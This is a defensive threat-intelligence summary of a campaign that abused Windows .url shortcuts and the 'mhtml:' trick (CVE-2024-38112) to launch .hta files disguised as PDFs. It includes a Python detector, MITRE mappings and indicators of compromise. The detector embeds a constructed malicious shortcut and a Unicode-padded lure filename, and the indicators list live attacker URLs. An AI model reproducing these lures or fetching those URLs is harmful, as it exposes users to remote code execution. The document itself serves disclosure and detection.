Check Point Research uncovered attackers using Windows .url shortcut files to lure victims into remote code execution via Internet Explorer. The attackers disguise an HTA payload as a PDF using the mhtml trick and hidden file extensions; Check Point's report to Microsoft led to the patch for CVE-2024-38112. #CVE-2024-38112 #Mshta
Key Points
- Threat actors are using .url files to exploit Windows users for remote code execution.
- The attacks leverage the retired Internet Explorer browser to bypass modern security measures.
- Attackers utilize the "mhtml" trick to disguise malicious URLs.
- Victims are misled into thinking they are opening PDF files, while they are actually executing .hta files.
- Check Point has released protections against these attacks and reported findings to Microsoft, leading to patches.
- Users are advised to be cautious with .url files from untrusted sources.
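The two tricks in the key points above (the mhtml prefix in a .url shortcut, and a filename whose visible ".pdf" is followed by invisible padding before the real ".hta") are both cheap to check for on the defender's side. The script below is an added example, not Check Point's tooling: it parses the [InternetShortcut] block of a .url file, flags the publicly documented mhtml:...!x-usc: form of the trick, and decodes a target filename to report when the extension shown to the user differs from the executable one at the end. The shortcut text, the lure.example host, and the padded filename are constructed for this example; the U+2800 BRAILLE PATTERN BLANK padding character (%E2%A0%80 when URL-encoded) is the one seen in the IoC URL on this page.

```python
"""Triage Windows .url shortcuts for the mhtml trick and Unicode-padded extensions.

Added example for defenders; not Check Point's code. Host names, the sample
shortcut and the padded filename are constructed.
"""
from __future__ import annotations

import re
import unicodedata
from urllib.parse import unquote, urlsplit

# Extensions that run code when the padded file is finally opened (constructed list).
EXECUTABLE_EXTS = {"hta", "exe", "js", "jse", "vbs", "vbe", "wsf", "scr",
                   "bat", "cmd", "ps1", "lnk", "url"}

# Constructed lure: "Report.pdf" + 13 x U+2800 (Braille blank, %E2%A0%80) + ".hta".
PADDED_NAME = "Report.pdf" + "%E2%A0%80" * 13 + ".hta"
SAMPLE_DOWNLOAD_URL = f"https://lure.example/te/{PADDED_NAME}"

# Constructed .url shortcut using the mhtml:...!x-usc:... form of the trick.
SAMPLE_URL_FILE = (
    "[InternetShortcut]\r\n"
    "URL=mhtml:http://lure.example/te/test1.html!x-usc:http://lure.example/te/test1.html\r\n"
    "ShowCommand=7\r\n"
)


def _is_invisible(ch: str) -> bool:
    """Characters that let a real extension scroll out of view: U+2800 (as used
    in this campaign), Unicode space separators and format characters."""
    return ch == "\u2800" or unicodedata.category(ch) in {"Zs", "Cf"}


def parse_url_file(text: str) -> str | None:
    """Return the URL= value of the [InternetShortcut] section, or None.
    Hand-parsed on purpose: ':' and '!' inside the value would confuse configparser."""
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].lower() == "internetshortcut"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            if key.strip().lower() == "url":
                return value.strip()
    return None


def extension_masquerade(filename: str) -> tuple[str, str] | None:
    """Return (claimed_ext, real_ext) when the decoded name shows one extension,
    then a run of invisible padding, then an executable extension; else None."""
    name = unquote(filename)
    pad = [i for i, ch in enumerate(name) if _is_invisible(ch)]
    if not pad:
        return None
    end = pad[-1]                       # last padding char
    start = end
    while start > 0 and _is_invisible(name[start - 1]):
        start -= 1                      # walk back to the start of that run
    head, tail = name[:start], name[end + 1:]
    real = tail.lstrip(".").lower()     # what Windows will actually execute
    if not real.isalnum() or real not in EXECUTABLE_EXTS:
        return None
    claimed = head.rsplit(".", 1)[-1].lower() if "." in head else ""
    if not claimed.isalnum() or claimed == real:
        return None
    return claimed, real


def masquerade_in_url(url: str) -> tuple[str, str] | None:
    """Apply extension_masquerade() to the last path segment of a URL."""
    return extension_masquerade(urlsplit(url).path.rsplit("/", 1)[-1])


def triage_url_file(text: str) -> list[str]:
    """Return human-readable findings for one .url shortcut (empty list = clean)."""
    findings: list[str] = []
    url = parse_url_file(text)
    if url is None:
        return findings
    lowered = url.lower()
    if lowered.startswith("mhtml:"):
        findings.append("mhtml: prefix forces the target to open in Internet Explorer (MSHTML)")
    if "!x-usc:" in lowered:
        findings.append("!x-usc: redirect nested inside the mhtml URL")
    # The page the victim really lands on is whatever follows the last !x-usc:.
    target = re.split(r"!x-usc:", url, flags=re.IGNORECASE)[-1]
    target = re.sub(r"^mhtml:", "", target, flags=re.IGNORECASE)
    masq = masquerade_in_url(target)
    if masq:
        findings.append(f"target looks like .{masq[0]} but really ends in .{masq[1]}")
    return findings


if __name__ == "__main__":
    for finding in triage_url_file(SAMPLE_URL_FILE):
        print("shortcut:", finding)
    print("download:", masquerade_in_url(SAMPLE_DOWNLOAD_URL))
```

The padding check is deliberately stricter than "contains odd whitespace": it only fires when a visible extension precedes the invisible run and an executable extension follows it, so an ordinary "My Report.pdf" is not flagged while "Report.pdf .exe" (plain spaces) is, since that is the same masquerade with a cheaper padding character.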
MITRE Techniques
- [T1203] Exploitation for Client Execution: Exploitation of vulnerabilities in applications to execute malicious code.
- [T1204] User Execution: Users are tricked into executing malicious files, such as .hta files disguised as PDFs.
- [T1218.005] Mshta: Mshta is used to execute HTA content downloaded via the URL. “the opened file is actually a malicious .hta file being downloaded and executed.”
- [T1036] Masquerading: Hiding malicious file extensions to evade detection.
Indicators of Compromise
- [Domain]: cbmelipilla.cl
- [URL]: http://cbmelipilla.cl/te/test1.html, https://cbmelipilla.cl/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80…hta
- [Hash]: bd710ee53ef3ad872f3f0678117050608a8e073c87045a06a86fb4a7f0e4eff0
- [Hash]: c9f58d96ec809a75679ec3c7a61eaaf3adbbeb6613d667257517bdc41ecca9ae